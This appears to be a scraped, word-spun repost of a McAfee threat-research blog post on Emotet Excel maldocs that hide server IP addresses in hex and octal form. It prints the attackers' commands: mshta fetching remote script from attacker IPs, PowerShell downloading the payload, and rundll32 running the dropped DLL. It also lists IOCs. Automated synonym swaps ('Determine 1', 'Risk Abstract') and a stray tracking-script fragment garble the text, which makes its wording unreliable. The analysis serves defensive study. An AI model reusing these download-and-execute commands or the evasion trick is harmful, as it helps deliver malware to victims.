[ad_1]
Authored By: Kiran Raj
In a current marketing campaign of Emotet, McAfee Researchers noticed a change in strategies. The Emotet maldoc was utilizing hexadecimal and octal codecs to signify IP deal with which is often represented by decimal codecs. An instance of that is proven beneath:
Hexadecimal format: 0xb907d607
Octal format: 0056.0151.0121.0114
Decimal format: 185.7.214.7
This modification in format may evade some AV merchandise counting on command line parameters however McAfee was nonetheless in a position to defend our prospects. This weblog explains this new approach.
Determine 1: Picture of An infection map for EMOTET Maldoc as noticed by McAfee
Risk Abstract
The preliminary assault vector is a phishing e mail with a Microsoft Excel attachment.
Upon opening the Excel doc and enabling modifying, Excel executes a malicious JavaScript from a server by way of mshta.exe
The malicious JavaScript additional invokes PowerShell to obtain the Emotet payload.
The downloaded Emotet payload will likely be executed by rundll32.exe and establishes a connection to adversaries’ command-and-control server.
Maldoc Evaluation
Beneath is the picture (determine 2) of the preliminary worksheet opened in excel. We are able to see some hidden worksheets and a social engineering message asking customers to allow content material. By enabling content material, the person permits the malicious code to run.
On inspecting the excel spreadsheet additional, we will see a couple of cell addresses added within the Named Supervisor window. Cells talked about within the Auto_Open worth will likely be executed routinely leading to malicious code execution.
Determine 3- Named Supervisor and Auto_Open triggers
Beneath are the instructions utilized in Hexadecimal and Octal variants of the Maldocs
FORMAT
OBFUSCATED CMD
DEOBFUSCATED CMD
Hexadecimal
cmd /c m^sh^t^a h^tt^p^:/^/[0x]b907d607/fer/fer.html
http://185[.]7[.]214[.]7/fer/fer.html
Octal
cmd /c m^sh^t^a h^tt^p^:/^/0056[.]0151[.]0121[.]0114/c.html
http://46[.]105[.]81[.]76/c.html
Execution
On executing the Excel spreadsheet, it invokes mshta to obtain and run the malicious JavaScript which is inside an html file.
Determine 4: Course of tree of excel execution
The downloaded file fer.html containing the malicious JavaScript is encoded with HTML Guardian to obfuscate the code
Determine 5- Picture of HTML web page seen on a browser
The Malicious JavaScript invokes PowerShell to obtain the Emotet payload from “hxxp://185[.]7[.]214[.]7/fer/fer.png” to the next path “C:UsersPublicDocumentsssd.dll”.
cmd line
(New-Object Internet.WebClient).DownloadString(‘http://185[.]7[.]214[.]7/fer/fer.png’)
The downloaded Emotet DLL is loaded by rundll32.exe and connects to its command-and-control server
cmd line
cmd /c C:WindowsSysWow64rundll32.exe C:UsersPublicDocumentsssd.dll,AnyString
IOC
TYPE
VALUE
SCANNER
DETECTION NAME
XLS
06be4ce3aeae146a062b983ce21dd42b08cba908a69958729e758bc41836735c
McAfee LiveSafe and Complete Safety
X97M/Downloader.nn
DLL
a0538746ce241a518e3a056789ea60671f626613dd92f3caa5a95e92e65357b3
McAfee LiveSafe and Complete Safety
Emotet-FSY
HTML URL
http://185[.]7[.]214[.]7/fer/fer.html
http://46[.]105[.]81[.]76/c.html
WebAdvisor
Blocked
DLL URL
http://185[.]7[.]214[.]7/fer/fer.png
http://46[.]105[.]81[.]76/cc.png
WebAdvisor
Blocked
MITRE ATT&CK
TECHNIQUE ID
TACTIC
TECHNIQUE DETAILS
DESCRIPTION
T1566
Preliminary entry
Phishing attachment
Preliminary maldoc makes use of phishing strings to persuade customers to open the maldoc
T1204
Execution
Consumer Execution
Handbook execution by person
T1071
Command and Management
Normal Software Layer Protocol
Makes an attempt to attach by HTTP
T1059
Command and Scripting Interpreter
Begins CMD.EXE for instructions execution
Excel makes use of cmd and PowerShell to execute command
T1218
Signed Binary Proxy Execution
Makes use of RUNDLL32.EXE and MSHTA.EXE to load library
rundll32 is used to run the downloaded payload. Mshta is used to execute malicious JavaScript
Conclusion
Workplace paperwork have been used as an assault vector for a lot of malware households in current instances. The Risk Actors behind these households are continually altering their strategies with a view to attempt to evade detection. McAfee Researchers are continually monitoring the Risk Panorama to determine these modifications in strategies to make sure our prospects keep protected and may go about their day by day lives with out having to fret about these threats.
x3Cimg peak=”1″ width=”1″ fashion=”show:none” src=”https://www.fb.com/tr?id=766537420057144&ev=PageView&noscript=1″ />x3C/noscript>’);
[ad_2]